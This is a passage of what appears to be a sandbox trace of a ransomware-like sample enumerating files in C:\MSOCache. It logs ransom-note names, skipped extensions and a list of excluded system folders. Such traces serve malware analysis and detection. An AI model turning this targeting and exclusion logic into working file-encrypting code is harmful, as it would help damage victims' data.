lpString2="ReadMe_Decryptor.txt") returned -1 [0107.576] lstrcmpiW (lpString1="Proof.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.576] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0107.576] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.576] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.576] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.576] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.576] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.576] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0107.576] lstrcmpW (lpString1="Proof.xml", lpString2=".") returned 1 [0107.576] lstrcmpW (lpString1="Proof.xml", lpString2="..") returned 1 [0107.576] lstrcmpiW (lpString1="Proof.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.576] lstrcmpiW (lpString1="Proof.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.576] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0107.576] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.576] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.576] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.576] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.577] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.577] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.577] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712290 [0107.577] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.577] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9e30 [0107.577] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.577] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0107.577] FindClose (in: hFindFile=0x758e08 | out: hFindFile=0x758e08) returned 1 [0107.577] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0107.577] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0107.577] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0107.577] lstrlenW (lpString="Proof.es") returned 8 [0107.577] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.es" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es" [0107.577] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Windows") returned -1 [0107.577] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.577] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.577] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\ProgramData") returned -1 [0107.577] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.577] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Intel") returned 1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\msys32") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Qt") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\ProgramData") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Program Files") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Windows") returned -1 [0107.578] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Program Files (x86)") returned -1 [0107.578] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" [0107.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\") returned 72 [0107.578] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758e08 [0107.579] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.579] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.579] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0107.580] lstrcmpW (lpString1="Proof.cab", lpString2=".") returned 1 [0107.580] lstrcmpW (lpString1="Proof.cab", lpString2="..") returned 1 [0107.580] lstrcmpiW (lpString1="Proof.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.580] lstrcmpiW (lpString1="Proof.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.580] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0107.580] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.580] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.580] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.580] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.580] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.580] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.580] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712290 [0107.580] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.580] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9fa0 [0107.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.581] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0107.581] lstrcmpW (lpString1="Proof.msi", lpString2=".") returned 1 [0107.581] lstrcmpW (lpString1="Proof.msi", lpString2="..") returned 1 [0107.581] lstrcmpiW (lpString1="Proof.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.581] lstrcmpiW (lpString1="Proof.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.581] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0107.581] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.581] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.581] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.581] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.581] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.581] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0107.581] lstrcmpW (lpString1="Proof.xml", lpString2=".") returned 1 [0107.581] lstrcmpW (lpString1="Proof.xml", lpString2="..") returned 1 [0107.581] lstrcmpiW (lpString1="Proof.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.581] lstrcmpiW (lpString1="Proof.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.581] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0107.581] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.581] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.582] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.582] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.582] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712290 [0107.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6ea058 [0107.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.582] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0107.582] FindClose (in: hFindFile=0x758e08 | out: hFindFile=0x758e08) returned 1 [0107.582] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0107.582] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0107.582] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 [0107.582] lstrlenW (lpString="Proof.fr") returned 8 [0107.582] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.fr" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr" [0107.582] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Windows") returned -1 [0107.582] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.582] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.582] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\ProgramData") returned -1 [0107.582] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Intel") returned 1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\msys32") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Qt") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\ProgramData") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Program Files") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Windows") returned -1 [0107.583] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Program Files (x86)") returned -1 [0107.583] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" [0107.583] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\") returned 72 [0107.583] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758e08 [0107.583] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.583] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.584] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.584] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.584] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0107.584] lstrcmpW (lpString1="Proof.cab", lpString2=".") returned 1 [0107.584] lstrcmpW (lpString1="Proof.cab", lpString2="..") returned 1 [0107.584] lstrcmpiW (lpString1="Proof.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.584] lstrcmpiW (lpString1="Proof.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.584] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0107.584] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.584] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.584] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.584] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.584] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712290 [0107.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6ea110 [0107.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.584] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0107.584] lstrcmpW (lpString1="Proof.msi", lpString2=".") returned 1 [0107.584] lstrcmpW (lpString1="Proof.msi", lpString2="..") returned 1 [0107.584] lstrcmpiW (lpString1="Proof.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.584] lstrcmpiW (lpString1="Proof.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.585] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0107.585] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.585] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.585] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.585] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.585] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.585] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0107.585] lstrcmpW (lpString1="Proof.xml", lpString2=".") returned 1 [0107.585] lstrcmpW (lpString1="Proof.xml", lpString2="..") returned 1 [0107.585] lstrcmpiW (lpString1="Proof.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.585] lstrcmpiW (lpString1="Proof.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.585] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0107.585] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.585] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.585] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.585] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.585] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.585] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.585] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712290 [0107.585] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.585] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6ea1c8 [0107.585] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.586] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0107.586] FindClose (in: hFindFile=0x758e08 | out: hFindFile=0x758e08) returned 1 [0107.586] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0107.586] lstrcmpW 